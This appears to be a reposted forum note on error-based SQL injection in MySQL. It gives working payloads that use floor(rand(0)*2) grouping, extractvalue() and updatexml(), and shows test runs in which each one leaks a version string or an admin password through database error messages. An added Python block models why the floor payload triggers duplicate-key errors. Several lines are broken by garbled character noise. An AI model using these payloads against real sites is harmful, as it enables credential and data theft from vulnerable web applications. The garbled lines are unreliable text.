Reposting some old notes. MySQL throws an error message when a statement fails, and PHP+MySQL sites often display that error text on the page, so the three methods below can be used to extract specific data through deliberately triggered errors.
Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor
The following exploit code can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version is leaked in the error. To read other data, replace version() in that position with another subquery.
For example, to read the administrator username and password:
Method1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
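Why the floor() payload errors at all, as an added example that is not part of the original notes: the Python below replays MySQL's GROUP BY over a temporary table with a unique index on the group key. MySQL evaluates the key expression once to look a group up and again when it inserts a new group, so a key that changes between the two evaluations can collide with a group the lookup did not see. rand(0) is seeded and yields the same values on every run; the first values of floor(rand(0)*2) are embedded as a constant taken from the commonly cited sequence (an assumption, not computed here).

```python
# Added example, not from the original notes: a pure-Python model of why
# `select count(*) ... group by concat(<data>, floor(rand(0)*2))` raises
# ERROR 1062 "Duplicate entry". MySQL groups rows into a temporary table with a
# unique index on the group key and evaluates the key expression twice for a
# new group: once to look it up and again when it inserts it. With a key that
# changes between the two evaluations, the insert can collide with a group that
# the lookup did not find. rand(0) is seeded, so its output is the same on every
# run; the first values of floor(rand(0)*2) are embedded below as a constant
# (assumption: taken from the commonly cited sequence, not computed here).

FLOOR_RAND0_SEQUENCE = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0]


class DuplicateEntryError(Exception):
    """Stands in for MySQL ERROR 1062 (23000)."""


def simulate_group_by(data, row_count, rand_values=None):
    """Replay the grouping of concat(data, floor(rand(0)*2)) over row_count rows.

    Returns the finished temp table {group_key: count} or raises
    DuplicateEntryError whose message carries the colliding key, i.e. the
    value the attacker wants to read.
    """
    rand_iter = iter(FLOOR_RAND0_SEQUENCE if rand_values is None else rand_values)
    groups = {}  # temp table: unique group key -> count(*)
    for _ in range(row_count):
        key = data + str(next(rand_iter))  # evaluation 1: look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = data + str(next(rand_iter))  # evaluation 2: build the row to insert
        if key in groups:                  # unique index violated
            raise DuplicateEntryError("Duplicate entry '%s' for key 'group_key'" % key)
        groups[key] = 1
    return groups


def leak_via_floor(data, row_count):
    """Return the value recovered from the error text, or None if no error fired."""
    try:
        simulate_group_by(data, row_count)
    except DuplicateEntryError as exc:
        entry = str(exc).split("'")[1]
        return entry[:-1]  # strip the trailing floor(rand(0)*2) digit
    return None


if __name__ == "__main__":
    # Rows 1-3 consume 0,1 | 1 | 0,1: the third row's insert hits the 'data1'
    # group created by the first row, so three rows are the minimum.
    print(leak_via_floor("5.1.33-community-log", 3))
    print(leak_via_floor("5.1.33-community-log", 2))
```

With the constant sequence the first row creates group 'data1', the second row finds it, and the third row's second evaluation tries to insert 'data1' again, which is the duplicate. That is why the payload needs at least three rows in the FROM clause: Method2 unions exactly three, and information_schema.tables always has more than that. Passing an all-ones sequence shows that a key which is merely non-deterministic-looking but stable between the two evaluations never errors, and unseeded rand() errors only some of the time, which is why rand(0) is used.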
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test run:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
' c: D+ x9 k/ U( U实际测试过程
9 g8 _5 T% G: \) }
# `' F4 T% d9 P5 v! s) f * m1 R) ]1 x2 l5 t; f4 s
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
That's all. Thanks to the foreign guys.
& R# ^) R" L2 Y/ N 5 k9 o' g* Y6 u8 H# t, ^
) P3 s8 v0 S% `
|